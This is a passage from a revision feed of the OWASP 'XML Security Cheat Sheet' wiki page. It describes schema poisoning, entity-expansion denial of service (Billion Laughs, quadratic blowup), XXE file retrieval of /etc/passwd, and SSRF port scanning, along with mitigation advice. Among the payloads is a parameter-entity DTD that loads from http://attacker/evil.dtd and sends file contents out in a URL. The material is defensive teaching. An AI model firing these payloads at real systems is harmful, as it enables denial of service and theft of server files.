However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224418</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224418"/>
				<updated>2016-12-21T19:43:28Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
